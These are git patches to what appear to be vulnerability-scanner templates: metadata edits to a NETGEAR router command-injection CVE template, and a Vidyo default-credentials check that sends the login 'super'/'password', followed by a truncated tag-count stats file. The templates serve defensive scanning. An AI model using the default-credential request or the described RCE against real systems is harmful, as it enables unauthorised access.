17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 4 Sep 2021 15:24:59 +0530 Subject: [PATCH 2028/4083] misc update --- cves/2016/CVE-2016-6277.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index 6f61ebef3c..15e20f4634 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -4,11 +4,11 @@ info: name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE author: pikpikcu severity: critical - reference: - - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 + reference: + - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ + - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - tags: cve,cves2016,netgear,rce + tags: cve,cves2016,netgear,rce,iot requests: - method: GET From f4187c14da3724859226d4e7aa8d2f3d4e14b7de Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 4 Sep 2021 15:28:58 +0530 Subject: [PATCH 2029/4083] Update CVE-2016-6277.yaml --- cves/2016/CVE-2016-6277.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-6277.yaml b/cves/2016/CVE-2016-6277.yaml index 15e20f4634..964fdfed40 100644 --- a/cves/2016/CVE-2016-6277.yaml +++ b/cves/2016/CVE-2016-6277.yaml @@ -4,11 +4,11 @@ info: name: NETGEAR routers (including R6400, R7000, R8000 and similar) RCE author: pikpikcu severity: critical + description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. + tags: cve,cves2016,netgear,rce,iot reference: - https://www.sj-vs.net/2016/12/10/temporary-fix-for-cert-vu582384-cwe-77-on-netgear-r7000-and-r6400-routers/ - https://nvd.nist.gov/vuln/detail/CVE-2016-6277 - description: NETGEAR R6250 before 1.0.4.6.Beta, R6400 before 1.0.1.18.Beta, R6700 before 1.0.1.14.Beta, R6900, R7000 before 1.0.7.6.Beta, R7100LG before 1.0.0.28.Beta, R7300DST before 1.0.0.46.Beta, R7900 before 1.0.1.8.Beta, R8000 before 1.0.3.26.Beta, D6220, D6400, D7000, and possibly other routers allow remote attackers to execute arbitrary commands via shell metacharacters in the path info to cgi-bin/. - tags: cve,cves2016,netgear,rce,iot requests: - method: GET From ae801e87eb8eb881d1c5bbb3fb5132f96209f561 Mon Sep 17 00:00:00 2001 From: sandeep <sandeep@projectdiscovery.io> Date: Sat, 4 Sep 2021 16:38:32 +0530 Subject: [PATCH 2030/4083] minor update --- ...in.yaml => vidyo-default-credentials.yaml} | 19 +++++++++---------- 1 file changed, 9 insertions(+), 10 deletions(-) rename default-logins/vidyo/{vidyo-super-admin.yaml => vidyo-default-credentials.yaml} (76%) diff --git a/default-logins/vidyo/vidyo-super-admin.yaml b/default-logins/vidyo/vidyo-default-credentials.yaml similarity index 76% rename from default-logins/vidyo/vidyo-super-admin.yaml rename to default-logins/vidyo/vidyo-default-credentials.yaml index 0749aa4548..1c27bad550 100644 --- a/default-logins/vidyo/vidyo-super-admin.yaml +++ b/default-logins/vidyo/vidyo-default-credentials.yaml @@ -5,6 +5,7 @@ info: author: izn0u severity: medium description: test for default cred super:password + reference: https://support.vidyocloud.com/hc/en-us/articles/226265128 tags: vidyo,default-login @@ -20,19 +21,11 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Origin: {{BaseURL}} - Referer: http://{{Hostname}}/super/login.html?lang=en + Referer: {{RootURL}}/super/login.html?lang=en Cookie: JSESSIONID={{session}} ; VidyoPortalSuperLanguage=en username=super&password=password - - | - GET /super/loginhistory.html?csrf_tkn={{csrf_tkn}} HTTP/1.1 - Host: {{Hostname}} - Referer: {{BaseURL}}/super/login.html?lang=en - - cookie-reuse: true - redirects: true - extractors: - type: regex name: csrf_tkn @@ -49,7 +42,13 @@ requests: kval: - JSESSIONID + matchers-condition: and matchers: - type: word + part: header words: - - "Vidyo MainSuperAdmin" + - "/super/index.html" + + - type: status + status: + - 302 \ No newline at end of file From 23f69a2a21af1a955bd9f396c7696ca073b26caa Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sat, 4 Sep 2021 11:18:38 +0000 Subject: [PATCH 2031/4083] Auto Generated Templates Stats [Sat Sep 4 11:18:38 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1463 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 747 insertions(+), 738 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 1aab383f1d..01a0ac282d 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":649},{"name":"panel","count":236},{"name":"xss","count":224},{"name":"lfi","count":221},{"name":"exposure","count":217},{"name":"wordpress","count":205},{"name":"rce","count":190},{"name":"cve2020","count":157},{"name":"wp-plugin","count":138},{"name":"tech","count":106},{"name":"cve2021","count":106},{"name":"config","count":93},{"name":"cve2019","count":91},{"name":"cve2018","count":80},{"name":"takeover","count":74},{"name":"apache","count":66},{"name":"","count":66},{"name":"token","count":64},{"name":"default-login","count":58},{"name":"iot","count":56},{"name":"joomla","count":52},{"name":"cve2017","count":48},{"name":"file","count":46},{"name":"unauth","count":45},{"name":"oob","count":45},{"name":"cve2010","count":44},{"name":"network","count":39},{"name":"sqli","count":37},{"name":"ssrf","count":32},{"name":"cve2016","count":32},{"name":"oracle","count":30},{"name":"logs","count":30},{"name":"workflow","count":30},{"name":"jira","count":28},{"name":"misc","count":27},{"name":"atlassian","count":27},{"name":"redirect","count":26},{"name":"listing","count":25},{"name":"generic","count":22},{"name":"router","count":19},{"name":"aem","count":19},{"name":"cisco","count":19},{"name":"cve2015","count":19},{"name":"sap","count":18},{"name":"disclosure","count":18},{"name":"auth-bypass","count":17},{"name":"springboot","count":16},{"name":"cve2014","count":15},{"name":"debug","count":14},{"name":"cve2012","count":14},{"name":"cve2011","count":13},{"name":"misconfig","count":13},{"name":"fuzz","count":13},{"name":"struts","count":13},{"name":"android","count":13},{"name":"jenkins","count":12},{"name":"weblogic","count":12},{"name":"dns","count":12},{"name":"php","count":12},{"name":"adobe","count":12},{"name":"dlink","count":12},{"name":"cve2013","count":11},{"name":"zoho","count":11},{"name":"devops","count":11},{"name":"ftp","count":9},{"name":"aws","count":9},{"name":"magento","count":9},{"name":"xxe","count":9},{"name":"cnvd","count":8},{"name":"scada","count":8},{"name":"gitlab","count":8},{"name":"ruijie","count":8},{"name":"login","count":8},{"name":"airflow","count":8},{"name":"rails","count":8},{"name":"cve2009","count":7},{"name":"nginx","count":7},{"name":"cms","count":7},{"name":"backup","count":7},{"name":"vmware","count":7},{"name":"jetty","count":6},{"name":"files","count":6},{"name":"google","count":6},{"name":"dell","count":6},{"name":"netgear","count":6},{"name":"solr","count":6},{"name":"django","count":6},{"name":"laravel","count":6},{"name":"cve2008","count":6},{"name":"coldfusion","count":6},{"name":"api","count":6},{"name":"docker","count":6},{"name":"citrix","count":6},{"name":"rconfig","count":6},{"name":"confluence","count":5},{"name":"windows","count":5},{"name":"ssti","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"ibm","count":5},{"name":"fileupload","count":5},{"name":"drupal","count":5},{"name":"microsoft","count":5},{"name":"printer","count":5},{"name":"headless","count":5},{"name":"wp-theme","count":5},{"name":"java","count":5},{"name":"lucee","count":5},{"name":"iis","count":5},{"name":"phpmyadmin","count":5},{"name":"wso2","count":4},{"name":"nodejs","count":4},{"name":"tomcat","count":4},{"name":"crlf","count":4},{"name":"solarwinds","count":4},{"name":"buffalo","count":4},{"name":"asp","count":4},{"name":"jolokia","count":4},{"name":"hp","count":4},{"name":"traversal","count":4},{"name":"zimbra","count":4},{"name":"vpn","count":4},{"name":"thinkcmf","count":4},{"name":"elastic","count":4},{"name":"webserver","count":4},{"name":"grafana","count":4},{"name":"moodle","count":4},{"name":"exchange","count":4},{"name":"firmware","count":4},{"name":"thinkphp","count":4},{"name":"hongdian","count":4},{"name":"magmi","count":4},{"name":"deserialization","count":4},{"name":"samsung","count":4},{"name":"glpi","count":4},{"name":"artifactory","count":4},{"name":"symfony","count":4},{"name":"fanruan","count":3},{"name":"caucho","count":3},{"name":"lfr","count":3},{"name":"opensis","count":3},{"name":"amazon","count":3},{"name":"openssh","count":3},{"name":"bypass","count":3},{"name":"kevinlab","count":3},{"name":"slack","count":3},{"name":"intrusive","count":3},{"name":"backups","count":3},{"name":"nexus","count":3},{"name":"httpd","count":3},{"name":"kubernetes","count":3},{"name":"oa","count":3},{"name":"mongodb","count":3},{"name":"vbulletin","count":3},{"name":"nacos","count":3},{"name":"ebs","count":3},{"name":"terramaster","count":3},{"name":"targa","count":3},{"name":"kafka","count":3},{"name":"bitrix","count":3},{"name":"microstrategy","count":3},{"name":"ssh","count":3},{"name":"zabbix","count":3},{"name":"zhiyuan","count":3},{"name":"ofbiz","count":3},{"name":"resin","count":3},{"name":"log","count":3},{"name":"tikiwiki","count":3},{"name":"springcloud","count":3},{"name":"r-seenet","count":3},{"name":"git","count":3},{"name":"fpd","count":3},{"name":"itop","count":3},{"name":"nosqli","count":3},{"name":"jellyfin","count":2},{"name":"chamilo","count":2},{"name":"strapi","count":2},{"name":"igs","count":2},{"name":"showdoc","count":2},{"name":"voipmonitor","count":2},{"name":"wordfence","count":2},{"name":"smtp","count":2},{"name":"axis2","count":2},{"name":"frp","count":2},{"name":"mail","count":2},{"name":"splunk","count":2},{"name":"kentico","count":2},{"name":"emerge","count":2},{"name":"prestashop","count":2},{"name":"trixbox","count":2},{"name":"saltstack","count":2},{"name":"rockethchat","count":2},{"name":"ec2","count":2},{"name":"hjtcloud","count":2},{"name":"maian","count":2},{"name":"bigip","count":2},{"name":"cve2005","count":2},{"name":"chiyu","count":2},{"name":"odoo","count":2},{"name":"mida","count":2},{"name":"openfire","count":2},{"name":"service","count":2},{"name":"sharepoint","count":2},{"name":"yapi","count":2},{"name":"horde","count":2},{"name":"vrealize","count":2},{"name":"webcam","count":2},{"name":"akkadian","count":2},{"name":"flir","count":2},{"name":"avantfax","count":2},{"name":"xxljob","count":2},{"name":"hasura","count":2},{"name":"axis","count":2},{"name":"dolibarr","count":2},{"name":"nextjs","count":2},{"name":"ucmdb","count":2},{"name":"azure","count":2},{"name":"oauth","count":2},{"name":"hashicorp","count":2},{"name":"ecology","count":2},{"name":"huawei","count":2},{"name":"fortios","count":2},{"name":"jboss","count":2},{"name":"jsf","count":2},{"name":"nagios","count":2},{"name":"guacamole","count":2},{"name":"keycloak","count":2},{"name":"rstudio","count":2},{"name":"firebase","count":2},{"name":"kibana","count":2},{"name":"jeedom","count":2},{"name":"leak","count":2},{"name":"paloalto","count":2},{"name":"hpe","count":2},{"name":"couchdb","count":2},{"name":"middleware","count":2},{"name":"telerik","count":2},{"name":"shellshock","count":2},{"name":"phpcollab","count":2},{"name":"github","count":2},{"name":"mcafee","count":2},{"name":"prometheus","count":2},{"name":"natshell","count":2},{"name":"seeyon","count":2},{"name":"grav","count":2},{"name":"glassfish","count":2},{"name":"proxy","count":2},{"name":"hoteldruid","count":2},{"name":"geowebserver","count":2},{"name":"backdoor","count":2},{"name":"status","count":2},{"name":"sonarqube","count":2},{"name":"plesk","count":2},{"name":"sonicwall","count":2},{"name":"akamai","count":2},{"name":"linkerd","count":2},{"name":"injection","count":2},{"name":"globalprotect","count":2},{"name":"waf","count":2},{"name":"openam","count":2},{"name":"idrac","count":2},{"name":"spark","count":2},{"name":"smb","count":2},{"name":"icewarp","count":2},{"name":"cve2007","count":2},{"name":"rockmongo","count":2},{"name":"activemq","count":2},{"name":"pega","count":2},{"name":"cache","count":2},{"name":"netis","count":2},{"name":"dos","count":2},{"name":"bigbluebutton","count":1},{"name":"cacti","count":1},{"name":"b2evolution","count":1},{"name":"clave","count":1},{"name":"fastapi","count":1},{"name":"smartblog","count":1},{"name":"alibaba","count":1},{"name":"tongda","count":1},{"name":"zend","count":1},{"name":"api-manager","count":1},{"name":"zcms","count":1},{"name":"shopxo","count":1},{"name":"ns","count":1},{"name":"xdcms","count":1},{"name":"codemeter","count":1},{"name":"appweb","count":1},{"name":"rubedo","count":1},{"name":"vsftpd","count":1},{"name":"upload","count":1},{"name":"alertmanager","count":1},{"name":"argussurveillance","count":1},{"name":"sceditor","count":1},{"name":"chevereto","count":1},{"name":"expressjs","count":1},{"name":"empirecms","count":1},{"name":"goahead","count":1},{"name":"apiman","count":1},{"name":"nuuo","count":1},{"name":"dotnetnuke","count":1},{"name":"redcap","count":1},{"name":"panos","count":1},{"name":"ricoh","count":1},{"name":"javamelody","count":1},{"name":"xmlchart","count":1},{"name":"cgi","count":1},{"name":"smi","count":1},{"name":"trilithic","count":1},{"name":"lighttpd","count":1},{"name":"klog","count":1},{"name":"pulsesecure","count":1},{"name":"kafdrop","count":1},{"name":"selea","count":1},{"name":"sco","count":1},{"name":"zmanda","count":1},{"name":"getsimple","count":1},{"name":"openx","count":1},{"name":"adminer","count":1},{"name":"idemia","count":1},{"name":"timesheet","count":1},{"name":"sarg","count":1},{"name":"landray","count":1},{"name":"flink","count":1},{"name":"lanproxy","count":1},{"name":"circontrol","count":1},{"name":"ruby","count":1},{"name":"opensmtpd","count":1},{"name":"default","count":1},{"name":"ewebs","count":1},{"name":"rmc","count":1},{"name":"whm","count":1},{"name":"tracer","count":1},{"name":"camera","count":1},{"name":"lg-nas","count":1},{"name":"resourcespace","count":1},{"name":"comodo","count":1},{"name":"xiuno","count":1},{"name":"ambari","count":1},{"name":"zm","count":1},{"name":"froxlor","count":1},{"name":"clockwatch","count":1},{"name":"st","count":1},{"name":"mysql","count":1},{"name":"pippoint","count":1},{"name":"parentlink","count":1},{"name":"openerp","count":1},{"name":"linux","count":1},{"name":"ilo4","count":1},{"name":"camunda","count":1},{"name":"rujjie","count":1},{"name":"servicedesk","count":1},{"name":"jnoj","count":1},{"name":"acexy","count":1},{"name":"phpfusion","count":1},{"name":"redhat","count":1},{"name":"octobercms","count":1},{"name":"xvr","count":1},{"name":"phpinfo","count":1},{"name":"fortigates","count":1},{"name":"opm","count":1},{"name":"kong","count":1},{"name":"yii","count":1},{"name":"triconsole","count":1},{"name":"vnc","count":1},{"name":"clickhouse","count":1},{"name":"bash","count":1},{"name":"webui","count":1},{"name":"huijietong","count":1},{"name":"codeigniter","count":1},{"name":"cocoon","count":1},{"name":"memcached","count":1},{"name":"circontrorl","count":1},{"name":"visualtools","count":1},{"name":"domxss","count":1},{"name":"node-red-dashboard","count":1},{"name":"sourcebans","count":1},{"name":"clink-office","count":1},{"name":"scimono","count":1},{"name":"auth","count":1},{"name":"pyramid","count":1},{"name":"csrf","count":1},{"name":"dom","count":1},{"name":"vscode","count":1},{"name":"socomec","count":1},{"name":"eyelock","count":1},{"name":"74cms","count":1},{"name":"duomicms","count":1},{"name":"svnserve","count":1},{"name":"discord","count":1},{"name":"bolt","count":1},{"name":"acontent","count":1},{"name":"tika","count":1},{"name":"concrete","count":1},{"name":"zookeeper","count":1},{"name":"aruba","count":1},{"name":"enum","count":1},{"name":"flash","count":1},{"name":"zeroshell","count":1},{"name":"nedi","count":1},{"name":"adb","count":1},{"name":"commax","count":1},{"name":"ulterius","count":1},{"name":"opensns","count":1},{"name":"fuelcms","count":1},{"name":"apos","count":1},{"name":"nomad","count":1},{"name":"livezilla","count":1},{"name":"robomongo","count":1},{"name":"payara","count":1},{"name":"redis","count":1},{"name":"thinkadmin","count":1},{"name":"monitorix","count":1},{"name":"aura","count":1},{"name":"jsp","count":1},{"name":"javafaces","count":1},{"name":"myucms","count":1},{"name":"mautic","count":1},{"name":"mirai","count":1},{"name":"expose","count":1},{"name":"stem","count":1},{"name":"xunchi","count":1},{"name":"acme","count":1},{"name":"qcubed","count":1},{"name":"ioncube","count":1},{"name":"proftpd","count":1},{"name":"iptime","count":1},{"name":"phpfastcache","count":1},{"name":"fortiweb","count":1},{"name":"nsasg","count":1},{"name":"2014","count":1},{"name":"rdp","count":1},{"name":"manageengine","count":1},{"name":"centos","count":1},{"name":"announcekit","count":1},{"name":"dvwa","count":1},{"name":"monitorr","count":1},{"name":"cherokee","count":1},{"name":"phpunit","count":1},{"name":"servicenow","count":1},{"name":"glances","count":1},{"name":"fedora","count":1},{"name":"mdb","count":1},{"name":"exponentcms","count":1},{"name":"geutebruck","count":1},{"name":"dompdf","count":1},{"name":"trane","count":1},{"name":"lotuscms","count":1},{"name":"springframework","count":1},{"name":"crm","count":1},{"name":"extractor","count":1},{"name":"plastic","count":1},{"name":"nc2","count":1},{"name":"processmaker","count":1},{"name":"moin","count":1},{"name":"nps","count":1},{"name":"websvn","count":1},{"name":"sophos","count":1},{"name":"cobub","count":1},{"name":"weiphp","count":1},{"name":"solman","count":1},{"name":"ssl","count":1},{"name":"alerta","count":1},{"name":"jquery","count":1},{"name":"chinaunicom","count":1},{"name":"spectracom","count":1},{"name":"netrc","count":1},{"name":"tapestry","count":1},{"name":"blue-ocean","count":1},{"name":"ueditor","count":1},{"name":"accela","count":1},{"name":"nweb2fax","count":1},{"name":"faraday","count":1},{"name":"keenetic","count":1},{"name":"salesforce","count":1},{"name":"totaljs","count":1},{"name":"hortonworks","count":1},{"name":"ems","count":1},{"name":"upnp","count":1},{"name":"bitly","count":1},{"name":"uwsgi","count":1},{"name":"kubeflow","count":1},{"name":"tectuus","count":1},{"name":"enumeration","count":1},{"name":"rabbitmq","count":1},{"name":"ilo","count":1},{"name":"varnish","count":1},{"name":"plugin","count":1},{"name":"majordomo2","count":1},{"name":"anchorcms","count":1},{"name":"logontracer","count":1},{"name":"labtech","count":1},{"name":"mantis","count":1},{"name":"sureline","count":1},{"name":"traefik","count":1},{"name":"wuzhicms","count":1},{"name":"phalcon","count":1},{"name":"pacsone","count":1},{"name":"mongoshake","count":1},{"name":"spf","count":1},{"name":" default-login","count":1},{"name":"oneblog","count":1},{"name":"azkaban","count":1},{"name":"geddy","count":1},{"name":"zte","count":1},{"name":"sitecore","count":1},{"name":"k8","count":1},{"name":"oscommerce","count":1},{"name":"bruteforce","count":1},{"name":"owasp","count":1},{"name":"mariadb","count":1},{"name":"db","count":1},{"name":"gotmls","count":1},{"name":"portainer","count":1},{"name":"grails","count":1},{"name":"webmodule-ee","count":1},{"name":"office365","count":1},{"name":"pgadmin","count":1},{"name":"magicflow","count":1},{"name":"jitsi","count":1},{"name":"cyberoam","count":1},{"name":"couchbase","count":1},{"name":"visionhub","count":1},{"name":"postgres","count":1},{"name":"beanshell","count":1},{"name":"razor","count":1},{"name":"emby","count":1},{"name":"sqlite","count":1},{"name":"diris","count":1},{"name":"openstack","count":1},{"name":"yealink","count":1},{"name":"tjws","count":1},{"name":"metinfo","count":1},{"name":"exposures","count":1},{"name":"openrestry","count":1},{"name":"jeewms","count":1},{"name":"lansweeper","count":1},{"name":"calendarix","count":1},{"name":"nexusdb","count":1},{"name":"webmin","count":1},{"name":"mobileiron","count":1},{"name":"netsweeper","count":1},{"name":"ecom","count":1},{"name":"embedthis","count":1},{"name":"commscope","count":1},{"name":"opencast","count":1},{"name":"esmtp","count":1},{"name":"dbeaver","count":1},{"name":"plone","count":1},{"name":"wazuh","count":1},{"name":"hiboss","count":1},{"name":"biometrics","count":1},{"name":"kyan","count":1},{"name":"jfrog","count":1},{"name":"javascript","count":1},{"name":"wildfly","count":1},{"name":"cerebro","count":1},{"name":"checkpoint","count":1},{"name":"dvr","count":1},{"name":"eprints","count":1},{"name":"zenario","count":1},{"name":"wiki","count":1},{"name":"xml","count":1},{"name":"ruckus","count":1},{"name":"ntopng","count":1},{"name":"cloudflare","count":1},{"name":"interlib","count":1},{"name":"feifeicms","count":1},{"name":"rhymix","count":1},{"name":"zzzcms","count":1},{"name":"linkedin","count":1},{"name":"svn","count":1},{"name":"hadoop","count":1},{"name":"fastcgi","count":1},{"name":"maccmsv10","count":1},{"name":"cors","count":1},{"name":"fortigate","count":1},{"name":"redwood","count":1},{"name":"solarlog","count":1},{"name":"darkstat","count":1},{"name":"sprintful","count":1},{"name":"plc","count":1},{"name":"k8s","count":1},{"name":"sidekiq","count":1},{"name":"gateone","count":1},{"name":"emc","count":1},{"name":"qvisdvr","count":1},{"name":"timeclock","count":1},{"name":"zarafa","count":1},{"name":"gloo","count":1},{"name":"etouch","count":1},{"name":"fortinet","count":1},{"name":"skywalking","count":1},{"name":"linksys","count":1},{"name":"netgenie","count":1},{"name":"spring","count":1},{"name":"csod","count":1},{"name":"lutron","count":1},{"name":"node","count":1},{"name":"fiori","count":1},{"name":"wamp","count":1},{"name":"yachtcontrol","count":1},{"name":"landrayoa","count":1},{"name":"pcoip","count":1},{"name":"tensorboard","count":1},{"name":"floc","count":1},{"name":"rmi","count":1},{"name":"avtech","count":1},{"name":"netdata","count":1},{"name":"bullwark","count":1},{"name":"h3c-imc","count":1},{"name":"mpsec","count":1},{"name":"blackboard","count":1},{"name":"tieline","count":1},{"name":"nette","count":1},{"name":"sentry","count":1},{"name":"sangfor","count":1},{"name":"primetek","count":1},{"name":"seacms","count":1},{"name":"tenda","count":1},{"name":"szhe","count":1},{"name":"jenzabar","count":1},{"name":"avalanche","count":1},{"name":"blind","count":1},{"name":"rsyncd","count":1},{"name":"jmx","count":1},{"name":"opentsdb","count":1},{"name":"qdpm","count":1},{"name":"wavemaker","count":1},{"name":"smartsense","count":1},{"name":"email","count":1},{"name":"panabit","count":1},{"name":"mantisbt","count":1},{"name":"sgp","count":1},{"name":"scs","count":1},{"name":"postmessage","count":1},{"name":"vsphere","count":1},{"name":"heroku","count":1},{"name":"pagespeed","count":1},{"name":"ganglia","count":1},{"name":"sage","count":1},{"name":"xff","count":1},{"name":"wmt","count":1},{"name":"favicon","count":1},{"name":"viewlinc","count":1},{"name":"miscrsoft","count":1},{"name":"simplecrm","count":1},{"name":"subrion","count":1},{"name":"influxdb","count":1},{"name":"krweb","count":1},{"name":"zyxel","count":1},{"name":"turbocrm","count":1},{"name":"gogs","count":1},{"name":"rfi","count":1},{"name":"lancom","count":1},{"name":"druid","count":1},{"name":"discourse","count":1},{"name":"eyou","count":1},{"name":"owa","count":1},{"name":"drone","count":1},{"name":"iceflow","count":1},{"name":"arl","count":1},{"name":"octoprint","count":1},{"name":"twitter-server","count":1},{"name":"openemr","count":1},{"name":"synnefo","count":1},{"name":"spidercontrol","count":1},{"name":"qsan","count":1},{"name":"cve2006","count":1},{"name":"dotnet","count":1},{"name":"achecker","count":1},{"name":"cofax","count":1},{"name":"gitlist","count":1},{"name":"tamronos","count":1},{"name":"moinmoin","count":1},{"name":"powercreator","count":1},{"name":"wondercms","count":1},{"name":"wifisky","count":1},{"name":"saltapi","count":1},{"name":"realteo","count":1},{"name":"tensorflow","count":1},{"name":"mara","count":1},{"name":"tileserver","count":1},{"name":"addpac","count":1},{"name":"npm","count":1},{"name":"bookstack","count":1},{"name":"perl","count":1},{"name":"webftp","count":1},{"name":"kerbynet","count":1},{"name":"asus","count":1},{"name":"tpshop","count":1},{"name":"soar","count":1},{"name":"haproxy","count":1},{"name":"starttls","count":1},{"name":"gespage","count":1},{"name":"liferay","count":1},{"name":"optiLink","count":1},{"name":"swagger","count":1},{"name":"centreon","count":1},{"name":"webadmin","count":1},{"name":"jenkin","count":1},{"name":"wooyun","count":1},{"name":"setup","count":1},{"name":"ghost","count":1},{"name":"cloudinary","count":1},{"name":"nuxeo","count":1},{"name":"episerver","count":1},{"name":"mediumish","count":1},{"name":"bedita","count":1},{"name":"finereport","count":1},{"name":"erp-nc","count":1},{"name":"dotclear","count":1},{"name":"clusterengine","count":1},{"name":"htmli","count":1},{"name":"cse","count":1},{"name":"mailchimp","count":1},{"name":"doh","count":1},{"name":"exacqvision","count":1},{"name":"wing-ftp","count":1},{"name":"bazarr","count":1},{"name":"shopware","count":1},{"name":"sar2html","count":1},{"name":"mongo","count":1},{"name":"viewpoint","count":1},{"name":"aspnuke","count":1},{"name":"expn","count":1},{"name":"spip","count":1},{"name":"woocomernce","count":1},{"name":"wavlink","count":1},{"name":"ssltls","count":1},{"name":"harbor","count":1},{"name":"fortilogger","count":1},{"name":"dnssec","count":1},{"name":"nordex","count":1},{"name":"gridx","count":1}],"authors":[{"name":"dhiyaneshdk","count":245},{"name":"pikpikcu","count":244},{"name":"pdteam","count":198},{"name":"daffainfo","count":176},{"name":"geeknik","count":149},{"name":"dwisiswant0","count":132},{"name":"gy741","count":72},{"name":"madrobot","count":62},{"name":"princechaddha","count":54},{"name":"pussycat0x","count":48},{"name":"gaurang","count":42},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"0x_akoko","count":24},{"name":"philippedelteil","count":19},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"pr3r00t","count":13},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"cyllective","count":11},{"name":"r3dg33k","count":11},{"name":"righettod","count":10},{"name":"random_robbie","count":10},{"name":"wdahlenb","count":9},{"name":"nadino","count":9},{"name":"hackergautam","count":9},{"name":"melbadry9","count":9},{"name":"iamthefrogy","count":8},{"name":"aashiq","count":8},{"name":"that_juan_","count":8},{"name":"dogasantos","count":7},{"name":"emadshanab","count":7},{"name":"0x240x23elu","count":7},{"name":"techryptic (@tech)","count":7},{"name":"dr_set","count":7},{"name":"harshbothra_","count":7},{"name":"kophjager007","count":7},{"name":"randomstr1ng","count":7},{"name":"oppsec","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"meme-lord","count":6},{"name":"caspergn","count":6},{"name":"rootxharsh","count":5},{"name":"joanbono","count":5},{"name":"pentest_swissky","count":5},{"name":"iamnoooob","count":5},{"name":"ganofins","count":5},{"name":"logicalhunter","count":5},{"name":"elsfa7110","count":5},{"name":"yanyun","count":5},{"name":"panch0r3d","count":5},{"name":"xelkomy","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"github.com/its0x08","count":4},{"name":"jarijaas","count":3},{"name":"mavericknerd","count":3},{"name":"shifacyclewala","count":3},{"name":"incogbyte","count":3},{"name":"lu4nx","count":3},{"name":"fyoorer","count":3},{"name":"z3bd","count":3},{"name":"dudez","count":3},{"name":"tess","count":3},{"name":"binaryfigments","count":3},{"name":"vsh00t","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"_generic_human_","count":3},{"name":"shine","count":3},{"name":"emenalf","count":3},{"name":"f1tz","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"alifathi-h1","count":2},{"name":"random-robbie","count":2},{"name":"kiblyn11","count":2},{"name":"udit_thakkur","count":2},{"name":"afaq","count":2},{"name":"nkxxkn","count":2},{"name":"x1m_martijn","count":2},{"name":"pxmme1337","count":2},{"name":"unstabl3","count":2},{"name":"cocxanh","count":2},{"name":"hahwul","count":2},{"name":"amsda","count":2},{"name":"dheerajmadhukar","count":2},{"name":"swissky","count":2},{"name":"0xprial","count":2},{"name":"bing0o","count":2},{"name":"joeldeleep","count":2},{"name":"bp0lr","count":2},{"name":"gal nagli","count":2},{"name":"whoever","count":2},{"name":"w4cky_","count":2},{"name":"gevakun","count":2},{"name":"foulenzer","count":2},{"name":"davidmckennirey","count":2},{"name":"moritz nentwig","count":2},{"name":"vavkamil","count":2},{"name":"manas_harsh","count":2},{"name":"parth","count":2},{"name":"0xelkomy","count":2},{"name":"zomsop82","count":2},{"name":"ehsahil","count":2},{"name":"0xcrypto","count":2},{"name":"sushantkamble","count":2},{"name":"randomrobbie","count":2},{"name":"fabaff","count":2},{"name":"hetroublemakr","count":2},{"name":"0xsapra","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"bsysop","count":2},{"name":"koti2","count":2},{"name":"lotusdll","count":2},{"name":"ree4pwn","count":2},{"name":"0xrudra","count":2},{"name":"arcc","count":2},{"name":"mohammedsaneem","count":2},{"name":"berkdusunur","count":1},{"name":"borna nematzadeh","count":1},{"name":"intx0x80","count":1},{"name":"fopina","count":1},{"name":"micha3lb3n","count":1},{"name":"rodnt","count":1},{"name":"kareemse1im","count":1},{"name":"alph4byt3","count":1},{"name":"aaron_costello (@conspiracyproof)","count":1},{"name":"geraldino2","count":1},{"name":"me9187","count":1},{"name":"makyotox","count":1},{"name":"cookiehanhoan","count":1},{"name":"pratik khalane","count":1},{"name":"manuelbua","count":1},{"name":"_darrenmartyn","count":1},{"name":"revblock","count":1},{"name":"schniggie","count":1},{"name":"tirtha_mandal","count":1},{"name":"ivo palazzolo 